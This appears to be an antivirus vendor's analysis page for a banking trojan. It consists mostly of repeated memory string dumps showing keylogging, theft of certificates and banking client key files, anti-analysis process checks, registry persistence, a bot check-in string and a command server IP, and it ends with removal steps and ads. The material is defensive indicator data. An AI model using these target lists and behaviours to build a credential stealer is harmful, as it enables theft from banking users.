CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_2560_rwx_00650000_00065000:

.text

`.rdata

@.data

.reloc

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

LOCALSERVICE!WINUK0FFOO83I6!427963A6

MSCTF.Shared.MAPPING.fffffffe

MSCTF.Shared.MAPPING.ffffffff

MSCTF.Shared.MAPPING.fffffffd

MSCTF.Shared.MUTEX.fffffffe

MSCTF.Shared.MUTEX.ffffffff

C:\Windows\apppatch\xodaql.exe

C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

conhost.exe_3956_rwx_00250000_00056000:

.text

`.data

.reloc

`.rdata

@.data

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

conhost.exe_3956_rwx_002B0000_00065000:

.text

`.rdata

@.data

.reloc

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

ADM!WINUK0FFOO83I6!427963A6

MSCTF.Shared.MAPPING.fffffffe

MSCTF.Shared.MAPPING.ffffffff

MSCTF.Shared.MAPPING.fffffffd

MSCTF.Shared.MUTEX.fffffffe

MSCTF.Shared.MUTEX.ffffffff

C:\Windows\apppatch\xodaql.exe

C:\Users\"%CurrentUserName%"\AppData\Roaming\

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Scan a system with an anti-rootkit tool.
Terminate malicious process(es) (How to End a Process With the Task Manager):

%original file name%.exe:2512
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

C:\Windows\System32\config\SOFTWARE.LOG1 (11529 bytes)
C:\Windows\AppPatch\xodaql.exe (2837 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

Gen.Variant.Zusy.Elzob.8654_bcf3331a73

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

Gen.Variant.Zusy.Elzob.8654_bcf3331a73

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet